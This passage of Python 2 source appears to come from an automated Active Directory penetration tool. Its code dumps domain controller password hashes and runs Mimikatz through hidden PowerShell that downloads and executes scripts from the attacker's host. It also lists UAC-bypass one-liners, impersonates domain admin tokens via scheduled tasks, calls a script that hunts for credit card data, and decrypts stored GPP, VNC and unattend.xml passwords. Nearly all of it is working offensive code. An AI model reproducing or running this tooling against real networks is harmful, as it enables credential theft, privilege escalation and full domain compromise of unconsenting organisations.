color=\"green\"))+\" Analyzing Hashes for Patterns\"\n    #Blank 31d6cfe0d16ae931b73c59d7e0c089c0\n    #NoLM  aad3b435b51404eeaad3b435b51404ee\n    tmpBlankHashList=[]\n    tmpHashList={}        \n    for x in hashList:\n        if \"31d6cfe0d16ae931b73c59d7e0c089c0\" in x:\n            if x not in tmpBlankHashList:\n                tmpBlankHashList.append(x)\n        username=x.split(\":\")[0]\n        uid=x.split(\":\")[1]\n        tmpHash=x.split(\":\")[2]+\":\"+x.split(\":\")[3]    \n        if tmpHash not in tmpHashList:   \n            tmpHashList[tmpHash]=username\n        else:\n            tmpStr = tmpHashList[tmpHash]\n            tmpStr += \", \"+username\n            tmpHashList[tmpHash]=tmpStr\n    tmpResultList=[]\n    for key, value in tmpHashList.iteritems():\n        tmpResultList.append([key,value])\n    if len(tmpResultList):\n        print \"Password Hashes Used By the Below Accounts\"\n        #print (setColor(\"\\nAccounts Using Same Password\", bold, color=\"red\"))\n        print tabulate(tmpResultList)\n    if len(tmpBlankHashList):\n        print \"\\nAccounts Using BLANK Password\"\n        #print (setColor(\"\\nAccounts Using Blank Password\", bold, color=\"red\"))\n        for x in tmpBlankHashList:\n            print x\n\ndef dumpDCHashes(tmphostno,tmpdomain,tmpusername,tmppassword):\n    #print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Domain Controller\"\n    #domain=''\n    #tmpdomain=getNetBiosName(tmphostno)\n    #tmpdomain='corp'\n    dumper1 = DumpSecrets(tmphostno, tmpusername, tmppassword, tmpdomain)\n    dumper1.dump()\n    lines=[]\n    time.sleep(10)\n    tmpLines1=[]      \n    if os.path.exists('secrets.ntds'):\n        with open('secrets.ntds') as f:\n            lines = f.read().splitlines()\n            for x in lines:\n                if not (x.split(\":\")[0]).endswith(\"$\"):\n                    if x not in tmpLines1:\n                        tmpLines1.append(x)\n        if len(tmpLines1)>0:\n            if len(tmpdomain)<1:\n                tmpdomain=\"WORKGROUP\"\n            if [tmphostno, tmpdomain, tmpusername, tmppassword] not in accessAdmHostList:\n                accessAdmHostList.append([tmphostno, tmpdomain, tmpusername, tmppassword])                            \n            print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" List of Valid Hashes\"\n            for x in tmpLines1:\n                print x\n        if os.path.exists('secrets.ntds'):\n            os.remove('secrets.ntds')\n    if os.path.exists('secrets.sam'):\n        with open('secrets.sam') as f:\n            lines = f.read().splitlines()\n            for x in lines:\n                if not (x.split(\":\")[0]).endswith(\"$\"):\n                    if x not in tmpLines1:\n                        tmpLines1.append(x)\n        if len(tmpLines1)>0:\n            if len(tmpdomain)<1:\n                tmpdomain=\"WORKGROUP\"\n            if [tmphostno, tmpdomain, tmpusername, tmppassword] not in accessAdmHostList:\n                accessAdmHostList.append([tmphostno, tmpdomain, tmpusername, tmppassword])                            \n            print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" List of Valid Hashes\"\n            for x in tmpLines1:\n                print x\n        if os.path.exists('secrets.sam'):\n            os.remove('secrets.sam')\n    return tmpLines1\n\ndef runMimikatz(targetIP,domain,username,password,passwordHash):\n    print \"\\n[*] Dumping Credentials via Mimikatz on Host: \"+targetIP\n    osArch64=getPowershellVersion(targetIP,domain,username,password,passwordHash)\n    powershellPath=getPowershellPath(osArch64)    \n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -DumpCreds\"    \n    if verbose==True:\n        print command\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpPasswordList=parseMimikatzOutput(results)\n    if len(tmpPasswordList)>0:\n        addPasswords(tmpPasswordList)\n        if password==None:\n            if len(domain)<1:\n                domain=\"WORKGROUP\"\n            if password!=None:\n                if [targetIP, domain, username, password] not in accessAdmHostList:\n                    accessAdmHostList.append([ip, str(domain), str(username), str(password)])\n        else:\n            if len(domain)<1:\n                domain=\"WORKGROUP\"\n            if password!=None:\n                if [targetIP, domain, username, password] not in accessAdmHostList:\n                    accessAdmHostList.append([ip, str(domain), str(username), str(password)])\n    return tmpPasswordList\n\ndef get_ip_address():\n    command=\"ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\\.){3}[0-9]*).*/\\\\2/p'\"\n    results = runCommand(command, shell = True, timeout = 15) \n    resultList=results[1].split(\"\\n\")\n    return resultList[0]\n\ndef reverseLookup(ip):\n    domainShort=''\n    domainFull=''\n    domain=\"\"\n    command=\"nmap --script smb-os-discovery.nse -p445 \"+ip\n    results = runCommand(command, shell = True, timeout = 15) \n    resultList=results[1].split(\"\\n\")\n    for x in resultList:\n        if \"|   Domain name: \" in x:\n            x=x.replace(\"|   Domain name: \",\"\")\n            domain=x\n    domainFull=domain\n    if domain.count(\".\")>1:\n        domain=domain.split(\".\")[0]\n        domainShort=domain\n    return domainShort,domainFull\n\ndef powershell_encode(data):\n    # blank command will store our fixed unicode variable\n    blank_command = \"\"\n    powershell_command = \"\"\n    # Remove weird chars that could have been added by ISE\n    n = re.compile(u'(\\xef|\\xbb|\\xbf)')\n    # loop through each character and insert null byte\n    for char in (n.sub(\"\", data)):\n        # insert the nullbyte\n        blank_command += char + \"\\x00\"\n    # assign powershell command as the new one\n    powershell_command = blank_command\n    # base64 encode the powershell command\n    powershell_command = base64.b64encode(powershell_command)\n    return powershell_command\n\ndef uploadFile(remoteFilename,localFilename,targetIP, domain, username, password, passwordHash):\n    command = \"powershell.exe -Command (New-Object System.Net.WebClient).DownloadFile('http://\"+myIP+\":8000/\"+remoteFilename+\"', ‘C:\\\\windows\\\\temp\\\\\"+localFilename+\"')\"\n    runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n\ndef getPowershellPath(osArch64):\n    cmd=\"\"\n    if osArch64==True:\n        cmd=\"C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n    else:\n        cmd=\"C:\\\\windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n    return cmd\n\ndef getPowershellVersion(targetIP,domain,username,password,passwordHash):\n    command='powershell -Command $Env:PROCESSOR_ARCHITECTURE'\n    try:                    \n        results=runWMIEXEC(targetIP, domain, username, password, passwordHash,command)        \n        if \"AMD64\" in results:\n            return True\n        else :\n            return False\n    except:\n        return True\n\ndef checkUAC(targetIP,domain,username,password,passwordHash):\n    osArch64=True\n    osArch64=getPowershellVersion(targetIP,domain,username,password,passwordHash)\n    powershellPath=getPowershellPath(osArch64)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\"(Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System).EnableLUA\"    \n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash,command)        \n    if verbose==True:\n        print command\n    if str(results).strip()==\"1\":\n        return True\n    else: \n        return False\n\ndef bypassUAC(targetIP,domain,username,password,passwordHash):\n    '''\n    /pentest/powershell/PowerShell-Suite/Bypass-UAC/Yamabiko/Yamabiko\n    powershell \"IEX (New-Object Net.WebClient).DownloadString('http://172.16.126.1:8000/Bypass-UAC.ps1'); Bypass-UAC -Method UacMethodSysprep\"\n    powershell \"IEX (New-Object Net.WebClient).DownloadString('http://172.16.126.1:8000/Bypass-UAC.ps1'); Bypass-UAC -Method ucmDismMethod\"\n    powershell \"IEX (New-Object Net.WebClient).DownloadString('http://172.16.126.1:8000/Bypass-UAC.ps1'); Bypass-UAC -Method UacMethodMMC2\"\n    powershell \"IEX (New-Object Net.WebClient).DownloadString('http://172.16.126.1:8000/Bypass-UAC.ps1'); Bypass-UAC -Method UacMethodTcmsetup\"\n    powershell \"IEX (New-Object Net.WebClient).DownloadString('http://172.16.126.1:8000/Bypass-UAC.ps1'); Bypass-UAC -Method UacMethodNetOle32\"\n    '''\n    return True\n\ndef tokensPriv(targetIP,domain,username,password,passwordHash):\n    osArch64=True\n    osArch64=getPowershellVersion(targetIP,domain,username,password,passwordHash)\n    powershellPath=getPowershellPath(osArch64)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n\n    foundUser=''\n    dcNetbiosName=''\n    tmpSchedName=generateRandomStr()\n    tmpFilename=generateRandomStr()+\".bat\"\n    mimikatzOutputFilename=generateRandomStr()\n    psTmpFilename=(generateRandomStr())+\".ps1\"\n    if len(dcList)>0:\n        dcNetbiosName=getNetBiosName(dcList[0])\n\n    command=powershellPath+\" \"+powershellArgs+\" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-TokenManipulation.ps1\\'); Invoke-TokenManipulation\"\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash,command)        \n    if verbose==True:\n        print command\n    resultList=results.split(\"\\n\")\n    tmpTokenList=[]\n    tmpdomain=\"\"\n    tmpusername=\"\"    \n    for x in resultList:\n        if \"Domain              : \" in x:\n            x=x.replace(\"Domain              : \",\"\") \n            tmpdomain=x.strip()\n        if \"Username            : \" in x:\n            x=x.replace(\"Username            : \",\"\")\n            tmpusername=x.strip()\n            tmpdomain=tmpdomain.strip()\n            tmpusername=tmpusername.strip()\n            if len(tmpdomain)>0 and len(tmpusername)>0:\n                tmpTokenList.append([tmpdomain,tmpusername])\n            tmpdomain=\"\"\n            tmpusername=\"\"\n    dcDomainNameList=[]\n    if len(dcList)>0:\n        isDA=getDomainAdminUsers(username,password,dcList[0])\n        dcDomainNameList=reverseLookup(dcList[0])\n        print dcDomainNameList\n\n    if len(tmpTokenList)>0:\n        print (setColor(\"[+]\", bold, color=\"green\"))+\" List of Tokens on host: \"+targetIP\n        headers = [\"Domain\",\"Username\"]\n        tmpPasswordList=[]\n        #print (setColor(\"\\nImpersonate Tokens on Host: \"+targetIP, bold, color=\"red\"))\n        print tabulate(tmpTokenList,headers,tablefmt=\"simple\")\n        print \"\\n\"\n        for x in tmpTokenList:\n            tmpDomain=(x[0]).lower()\n            tmpUsername=x[1]\n            if len(tmpUsername)>0:\n                if tmpUsername.lower() in domainAdminList and tmpDomain in dcDomainNameList:\n                    foundUser = tmpDomain+\"\\\\\"+tmpUsername\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" Found Domain Admin Token: '\"+foundUser+\"'\"\n\n                    print \"[*] Checking Currently Logged On Users on Host: \"+targetIP\n                    command=' -Command \"Get-WMIObject -class Win32_ComputerSystem | select username\"'\n                    command=powershellPath+\" \"+powershellArgs+command\n                    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                    tmpResultList=results.split(\"\\n\")\n                    foundStart=False\n                    loggedInUsersList=[]\n                    for x in tmpResultList:\n                        x=x.strip()            \n                        if len(x)>0:\n                            if foundStart==True:\n                                if x not in loggedInUsersList:\n                                    loggedInUsersList.append(x)                            \n                                    print x\n                            if '--------' in x:\n                                foundStart=True\n                    print \"[*] Checking if UAC is Enabled on Host \"+targetIP\n                    tmpUACMode=checkUAC(targetIP,domain,username,password,passwordHash)\n                    if tmpUACMode==False:\n                        print \"[*] UAC is Disabled on Host: \"+targetIP\n                        print \"[*] Attempting to Elevate Privileges Using Token: '\"+foundUser+\"'\"\n                        s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/Invoke-TokenManipulation.ps1\\');Invoke-TokenManipulation -CreateProcess \"'+powershellPath+'\" -Username '+foundUser+' -ProcessArgs \"-windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta IEX (New-Object Net.WebClient).DownloadString(\\'http://is.gd/oeoFuI\\');Invoke-Mimikatz -DumpCreds  -ComputerName '+dcNetbiosName+' | Out-File C:\\\\windows\\\\temp\\\\'+mimikatzOutputFilename+'.txt\"'''\n                        encodedPS=powershell_encode(s)\n\n                        cmd = powershellPath+\" -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass -ec \"+encodedPS\n                        target = open(tmpFilename, 'w')\n                        target.write(cmd)\n                        target.close()\n                        \n                        uploadFile(tmpFilename,tmpFilename,targetIP, domain, username, password, passwordHash)\n                        \n                        command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'\n                        results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                        command='schtasks.exe /Create /RL HIGHEST /RU '+domain+'\\\\'+username+' /TN '+tmpSchedName+' /SC MONTHLY /M DEC /TR \"'\"C:\\\\windows\\\\temp\\\\\"+tmpFilename\n                        results=runPSEXEC(targetIP, domain, username, password, passwordHash, command)    \n                        print \"[*] Running Tasks on Host: \"+targetIP\n                        command='schtasks /Run /TN '+tmpSchedName    \n                        results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                        checkComplete=False\n                        while checkComplete==False:\n                            command='schtasks /Query /TN '+tmpSchedName\n                            results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)            \n                            tmpResultList=results.split(\"\\n\")\n                            for x in tmpResultList:\n                                if tmpSchedName in x:\n                                    if \"Ready\" in x or \"Running\" in x:\n                                        if \"Ready\" in x:\n                                            print \"[*] Removing Tasks from Host: \"+targetIP\n                                            command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'                \n                                            runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                                            checkComplete=True\n                                        if \"Running\" in x:\n                                            time.sleep(10)\n\n                        print \"[*] Attempting to Run Mimikatz on Domain Controller: \"+dcList[0]\n                        waitForPSComplete=False\n                        while waitForPSComplete==False:\n                            filePath=\"C:\\\\windows\\\\temp\\\\\"+mimikatzOutputFilename+\".txt\"\n                            tmpFilename=downloadFile(targetIP,domain,username,password,filePath)\n                            if len(tmpFilename)>0:\n                                if os.path.exists(tmpFilename):\n                                    tmpFilename1=convertWinToLinux(tmpFilename)\n                                    lines = str(open(tmpFilename1, 'r').read())\n                                    tmpPasswordList=parseMimikatzOutput(lines)\n                                    if len(tmpPasswordList)>0:\n                                        addPasswords(tmpPasswordList)\n                                        print \"\\nTesting Credentials\"\n                                        for y in tmpPasswordList:\n                                            tmpdomain=y[0]\n                                            tmpusername=y[1]\n                                            tmppassword=y[2]\n                                            tmpLoginOK,tmpAdminOK=testDomainCredentials(tmpusername,tmppassword,passwordHash,dcList[0],tmpdomain)\n                                            if tmpAdminOK==True:\n                                                if y not in daPassList:\n                                                    daPassList.append(y)\n\n                                                print (setColor(\"\\nDumping Hashes from Domain Controller: \"+ip, bold, color=\"green\"))\n                                                tmpHashList=dumpDCHashes(dcList[0],tmpdomain,tmpusername,tmppassword)    \n                                                if len(tmpHashList)>0:\n                                                    addHashes(tmpHashList)\n                                                    analyzeHashes(tmpHashList)\n                                                    dcCompromised=True\n                                                    for tmpDCip in dcList:\n                                                        if tmpDCip in uncompromisedHostList:\n                                                            uncompromisedHostList.remove(tmpDCip)\n\n                                    waitForPSComplete=True\n                            else:\n                                print \"[*] Sleeping for 10 seconds\"\n                                time.sleep(10)\n                    #if len(tmpPasswordList)>0:\n                    #    tmpdomain=y[0]\n                    #    tmpusername=y[1]\n                    #    tmppassword=y[2]                        \n                    #    tmpHashList=(dcList[0],tmpusername,tmppassword,passwordHash)\n                    #    print (setColor(\"\\nDumping Plaintext Credentials from Domain Controller: \"+ip, bold, color=\"red\"))\n                    #    runMimikatz(ip,domain,username,password,passwordHash)    \n\n\ndef generateRandomStr():\n chars = string.letters + string.digits\n pwdSize = 20\n return ''.join((random.choice(chars)) for x in range(pwdSize))\n\ndef listUsers(targetIP,domain,username,password,passwordHash):\n    command='dir.exe C:\\Users /b /ad'\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpResultList=results.split(\"\\n\")\n    tmpResultList1=[]\n    for x in tmpResultList:\n        x=x.strip()\n        if \"File Not Found\"!=x and \"All Users\"!=x and \"Default\"!=x and \"Default User\"!=x and \"Public\"!=x:\n            if len(x)>0:\n                tmpResultList1.append(x)\n    return tmpResultList1\n\ndef listProcesses(targetIP,domain,username,password):\n    #command=powershellCmdStart+\" -Command \\\"get-process | select name | sort name\\\"\"\n    command=powershellCmdStart+\" -Command \\\"get-process | select name\\\"\"\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpResultList1=[]\n    found=False\n    tmpResultList=results.split(\"\\n\")\n    for x in tmpResultList:\n        x=x.strip()   \n        if found==True:\n            #if x not in tmpResultList1:\n            tmpResultList1.append(x)     \n        if x==\"----\" :\n            found=True\n    return tmpResultList1\n\ndef memCredDump(targetIP,domain,username,password,passwordHash,processName):\n    command=powershellCmdStart+' -Command \"(New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/mem_scraper.ps1\\',\\'C:\\windows\\\\temp\\mem_scraper.ps1\\');c:\\windows\\\\temp\\mem_scraper.ps1 -Proc '+processName+' -NumsOnly -Logging;\"'\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpResultList=results.split(\"\\n\")\n    return tmpResultList\n\ndef diskCredDump(targetIP,domain,username,password,passwordHash):\n    command=powershellCmdStart+' -Command \"(New-Object Net.WebClient).DownloadFile(\\'http://\"+myIP+\":8000/credit-card-finder.ps1\\’,\\'%temp%\\credit-card-finder.ps1\\');%temp%\\credit-card-finder.ps1 -path c:\\\\\\\\\"'\n    results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpResultList=results.split(\"\\n\")\n    return tmpResultList\n    \ndef listRemoteShare(targetIP,domain, username, password):\n\n    tmpList = []\n    deniedList = []\n    allowedList = []\n    conn = SMBConnection1(username,password,client_machine_name,targetIP,domain=domain,use_ntlm_v2=True,is_direct_tcp=True)\n    connected = conn.connect(targetIP, 445)  \n    folderDepth=3\n    try:\n        shares = conn.listShares()\n        for x in shares:\n            try:\n                shareName = x.name\n                if shareName != 'ADMIN$':\n                    count=0\n                    subDirectory=\"\"\n                    subDirectoryList=[]\n                    tmpsubDirectoryList=[]\n                    while count<int(folderDepth):\n                        if count==0:\n                            sharedfiles = conn.listPath(shareName, '/'+subDirectory)\n                            for y in sharedfiles:\n                                if y.filename != '.' and y.filename != '..' and y.isDirectory==True and y.filename!='Windows' and y.filename!='Boot' and y.filename!='Public':\n                                #if y.filename != '.' and y.filename != '..' and y.isDirectory==True:\n                                    subDirectoryList.append(y.filename)\n                                    try:\n                                        sharedfiles1 = conn.listPath(shareName, '/'+y.filename)\n                                        #names = conn.listPath(shareName, '/' + y.filename)\n                                        if [targetIP, username, password,shareName + '/' + y.filename] not in allowedList:\n                                            allowedList.append([targetIP,username, password, shareName + '/' + y.filename])\n                                    except:\n                                        if [targetIP, username, password, shareName + '/' + y.filename] not in deniedList:\n                                            deniedList.append([targetIP, username, password, shareName + '/' + y.filename])\n\n                        else:\n                            tmpsubDirectoryList = subDirectoryList\n                            subDirectoryList=[]\n                            for z in tmpsubDirectoryList:\n                                try:                                    \n                                    if not z.startswith(\"/\"):\n                                        sharedfiles = conn.listPath(shareName, '/'+z)   \n                                    else:\n                                        sharedfiles = conn.listPath(shareName, z)   \n                                    for g in sharedfiles:        \n                                        #print g.filename\n                                        if g.filename != '.' and g.filename != '..' and g.isDirectory==True:   \n                                            subDirectoryList.append(z+\"/\"+g.filename)\n                                            #subDirectoryList.append(\"/\"+z+\"/\"+g.filename)\n                                            try:                                                                                                \n                                                sharedfiles1 = conn.listPath(shareName, '/'+  z + \"/\" + g.filename)\n                                                if [targetIP, username, password,shareName + '/' +  z + \"/\" + g.filename] not in allowedList:\n                                                    allowedList.append([targetIP,username, password, shareName + '/' + z + \"/\" + g.filename])\n                                            except:\n                                                if [targetIP, username, password, shareName + '/' + z + \"/\" + g.filename] not in deniedList:\n                                                    deniedList.append([targetIP, username, password, shareName + '/' + z + \"/\" + g.filename])\n                                except Exception as e:\n                                    continue\n\n                        count+=1\n            except Exception as e:\n                continue\n    except Exception as e:\n        if \"Failed to list shares: Unable to connect to IPC$\" in e:\n            print \"[Error] Failed to list shares: Unable to connect to IPC$\"\n        else:\n            print e\n        pass\n    return (allowedList, deniedList)\n\ndef getInstalledPrograms(targetIP,domain,username,password,passwordHash):\n    osArch64=getPowershellVersion(ip,domain,username,password,passwordHash)\n    powershellPath=getPowershellPath(osArch64)\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\" -command \\\"(Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion | Format-Table –AutoSize)\\\"\"\n    if verbose==True:\n        print command\n    passwordHash=None    \n    results=runWMIEXEC(targetIP,domain,username,password,passwordHash,command)\n    tmpResultList1=[]\n    if \"FullyQualifiedErrorId\" not in str(results):\n        count=0\n        tmpResultList=results.split(\"\\n\")\n        for x in tmpResultList:\n            x=x.strip()\n            if count>2 and len(x)>0:  \n                tmpResultList1.append([targetIP,x])         \n            count+=1\n        return tmpResultList1\n    else:\n        return []\n\ndef readRemoteRegistry(targetIP,domain,username,password,passwordHash,keyPath,selectedKey):\n    regHandler = RegHandler(targetIP,domain,username,password,passwordHash,keyPath,selectedKey)\n    try:\n        (results, status) = regHandler.run(targetIP, targetIP)\n        if 'ERROR_FILE_NOT_FOUND' in results:\n            if passwordHash != None:\n                tmpRegResultList2.append([targetIP,'Missing Key',username,passwordHash,keyPath + '\\\\' + selectedKey,None])\n            else:\n                tmpRegResultList2.append([targetIP,'Missing Key',username,password,keyPath + '\\\\' + selectedKey,None])\n        if 'Invalid root key HKCU' in results:\n            tmpRegResultList2.append([targetIP, 'Missing Key', keyPath + '\\\\' + selectedKey, None])\n        if status == True:\n            return results\n    except Exception, e:\n        print e\n        pass\n\ndef downloadFile(targetIP,domain,username,password,filePath):  \n    tmpFilePath=filePath.split(\":\\\\\")\n    shareName=tmpFilePath[0]+\"$\"    \n    filePath=tmpFilePath[1]\n    filePath=filePath.replace(\"\\\\\",\"/\")  \n    if not filePath.startswith(\"/\"):\n        filePath=\"/\"+filePath  \n    try:\n        conn = SMBConnection1(username,password,client_machine_name,targetIP,domain=domain,use_ntlm_v2=True,is_direct_tcp=True)\n        connected = conn.connect(targetIP, 445)\n        if connected == True:\n            try:\n                file_obj = tempfile.NamedTemporaryFile(delete=False)\n                tempFilename = tempfile.NamedTemporaryFile(dir='.').name\n                tempFilename=targetIP+\"_\"+tmpFilePath[0]+\"_\"+filePath.replace(\"/\",\"_\")\n                file_obj = open(tempFilename, 'w')\n                (file_attributes, filesize) = conn.retrieveFile(shareName,filePath, file_obj)\n                file_obj.close()\n                return tempFilename\n            except Exception as e:\n                #print e\n                return \"\"\n    except:\n        return \"\"\n\ndef parseSiteManagerXML(filename):\n    #Sample https://raw.githubusercontent.com/synzox/dotfiles/master/.filezilla/sitemanager.xml\n    resultList = []\n    with open(filename, 'r') as myfile:\n        data = myfile.read().replace('\\n', '')\n        result = xmltodict.parse(data)\n        if isinstance(result['FileZilla3']['Servers'],dict)==True:\n            tmphostNo=\"\"\n            tmpportNo=\"\"\n            tmpusername=\"\"\n            tmppassword=\"\"\n            for k1, v1 in result['FileZilla3']['Servers'].iteritems():\n                if k1=='Server':\n                    if isinstance(v1,list):\n                        for x in v1:\n                            if isinstance(x,dict):\n                                tmphostNo=x['Host']\n                                tmpportNo=x['Port']\n                                try:\n                                    tmpusername=x['User']\n                                except KeyError:\n                                    tmpusername=\"\"\n                                try:\n                                    tmppassword=x['Pass']\n                                except KeyError:\n                                    tmppassword=\"\"\n                                try:\n                                    tmpdecodedPassword=base64.b64decode(tmppassword)\n                                except TypeError:\n                                    tmpdecodedPassword=tmppassword\n                                if len(tmpusername)>0 and len(tmpdecodedPassword)>0:\n                                    resultList.append([tmphostNo+\":\"+tmpportNo, tmpusername, tmpdecodedPassword])\n    return resultList\n\ndef decryptUltraVNC(hashPassword):\n    try:\n        hashPassword = binascii.unhexlify(hashPassword)\n        desKey = \"\\xE8\\x4A\\xD6\\x60\\xC4\\x72\\x1A\\xE0\"\n        obj = Crypto.Cipher.DES.new(desKey, Crypto.Cipher.DES.MODE_ECB)\n        decrypt = obj.decrypt(hashPassword)\n        decrypt=decrypt.replace(\"\\x00\",\"\")\n        return decrypt\n    except Exception, e:\n        print e\n\ndef parseUltraVNC(filename):\n    #Sample https://raw.githubusercontent.com/justdan96/VNCappWrapper/master/ultravnc.ini\n    #Decrypt tool http://tools88.com/safe/vnc.php\n    resultList = []\n    passwd1 = ''\n    passwd2 = ''\n    with open(filename, 'r') as myfile:\n        data = myfile.read().splitlines()\n        for row in data:\n            tmpRow = row.strip()\n            if 'passwd' in row.strip().lower():\n                passwd1 = tmpRow.split('=')[1].strip()\n            if 'passwd2' in row.strip().lower():\n                passwd2 = tmpRow.split('=')[1].strip()\n        if len(passwd1) > 0 or len(passwd2) > 0:\n            passwd1 = decryptUltraVNC(passwd1[0:16])\n            passwd2 = decryptUltraVNC(passwd2[0:16])\n            resultList.append([passwd1, passwd2])\n    return resultList\n\ndef parseUnattendXML(filename):\n    #Sample http://www.itninja.com/question/how-do-i-add-a-custom-local-administrator-account-through-sysprep\n    tmpUserList=[]\n    resultList = []\n    try:\n        with open(filename, 'r') as myfile:\n            data = myfile.read().replace('\\n', '')\n            result = xmltodict.parse(data)\n            if isinstance(result['unattend']['settings'],list)==True:\n                for y in result['unattend']['settings']:\n                    if isinstance(y,dict)==True:\n                        for k1, v1 in y.iteritems():\n                            if k1=='component':\n                                if isinstance(v1,list)==True:\n                                    for z in v1:\n                                        for key, value in z.iteritems():\n                                           if key=='UserAccounts':\n                                                for k, v in value.iteritems():\n                                                    if k=='AdministratorPassword':\n                                                        tmpUsername='Administrator'\n                                                        tmpPassword=v['Value']\n                                                        if [tmpUsername,tmpPassword] not in tmpUserList:\n                                                            tmpUserList.append([tmpUsername,tmpPassword])\n                                                    if k=='LocalAccounts':\n                                                        tmpUsername=v['LocalAccount']['DisplayName']\n                                                        tmpPassword=v['LocalAccount']['Password']['Value']\n                                                        if [tmpUsername,tmpPassword] not in tmpUserList:\n                                                            tmpUserList.append([tmpUsername,tmpPassword])\n            else:\n                for key, value in result['unattend']['settings'].iteritems():\n                    if key=='component':\n                        if isinstance(value,list)==True:\n                            for x in value:\n                                for k1, v1 in x.iteritems():\n                                    if k1=='WindowsDeploymentServices':\n                                        for k2, v2 in v1.iteritems():\n                                            if k2=='Login':\n                                                tmpUsername=v2['Credentials']['Username']\n                                                tmpPassword=v2['Credentials']['Password']\n                                                if [tmpUsername,tmpPassword] not in tmpUserList:\n                                                    tmpUserList.append([tmpUsername,tmpPassword]) \n\n    except:\n        print \"Error parsing unattend.xml file\"\n    return tmpUserList\n\ndef decryptGPP(cpassword):\n    #https://raw.githubusercontent.com/reider-roque/pentest-tools/master/password-cracking/gpprefdecrypt/gpprefdecrypt.py\n    # Key from MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2\n    key = (\"4e9906e8fcb66cc9faf49310620ffee8\" \n          \"f496e806cc057990209b09a433b66c1b\").decode('hex')\n    cpassword += \"=\" * ((4 - len(cpassword) % 4) % 4)\n    password = base64.b64decode(cpassword)     \n    # Decrypt the password\n    iv = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n    o = AES.new(key, AES.MODE_CBC, iv).decrypt(password)     \n    return o[:-ord(o[-1])].decode('utf16')\n \ndef getOSType():\n    import platform\n    return platform.system()\n\ndef mountSysvol(username,password):\n    #Sample cpassword=j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw\n    tmpPassList=[]\n    randomFoldername=generateRandomStr()\n    cmd = \"mkdir /tmp/\"+randomFoldername\n    resultList = runCommand(cmd, shell = True, timeout = 15) \n    cmd = \"umount /tmp/\"+randomFoldername\n    resultList = runCommand(cmd, shell = True, timeout = 15) \n    if getOSType()==\"Darwin\":\n        cmd = \"mount_smbfs  //\"+username+\":'\"+password+\"'@\"+dcList[0]+\"/sysvol /tmp/\"+randomFoldername\n    if getOSType()==\"Linux\":\n        cmd = \"mount -t cifs //\"+dcList[0]+\"/sysvol /tmp/\"+randomFoldername+\" -o username=\"+username+\",password=\"+password\n    resultList = runCommand(cmd, shell = True, timeout = 15) \n    cmd = \"grep -lir cpassword /tmp/\"+randomFoldername\n    resultList = runCommand(cmd, shell = True, timeout = 60) \n    if len(resultList[1])>0:\n        tmpList=[]\n        fileList=resultList[1].split(\"\\n\")\n        tmpPassList=[]\n        if len(fileList)>0:\n            print (setColor(\"[+]\", bold, color=\"green\"))+\" Credentials found in SYSVOL folder\"\n            for x in fileList:\n                x=x.strip()\n                if len(x)>0:\n                    if len(x.strip())>0:\n                        with open(x, 'r') as myfile:\n                            username=\"\"\n                            password=\"\"\n                            content=myfile.read().replace('\\n', '')\n                            m = re.search('userName=\"(\\S*)\"', content)\n                            if m:\n                                username = m.group(1)\n                            m = re.search('cpassword=\"(\\S*)\"', content)\n                            if m:\n                                password = m.group(1)\n                                print \"[*] Base64 Password Found: \"+password\n                                password=decryptGPP(password)\n                            if len(username)>0 and len(password)>0:\n                                username = username.lower()\n                                if [username,password] not in tmpPassList:\n                                    tmpPassList.append([username,password])\n        if len(tmpPassList)>0:\n            print (setColor(\"[+]\", bold, color=\"green\"))+\" Decrypted GPP Password\"            \n            headers = [\"Username\",\"Password\"]\n            print tabulate(tmpPassList,headers,tablefmt=\"simple\")\n            if len(tmpPassList)>0:\n                print \"\\nTesting 